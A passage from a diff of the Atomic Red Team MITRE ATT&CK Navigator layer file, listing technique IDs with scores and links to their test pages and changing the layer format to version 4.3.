o/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1484.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1484","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techn
iqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.
002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"tec
hniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.0
12.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/
T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/ma
ster/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"},{"techniqueID":"T1557.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1557","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment
":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1567","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1588.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"},{"techniqueID":"T1588","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View 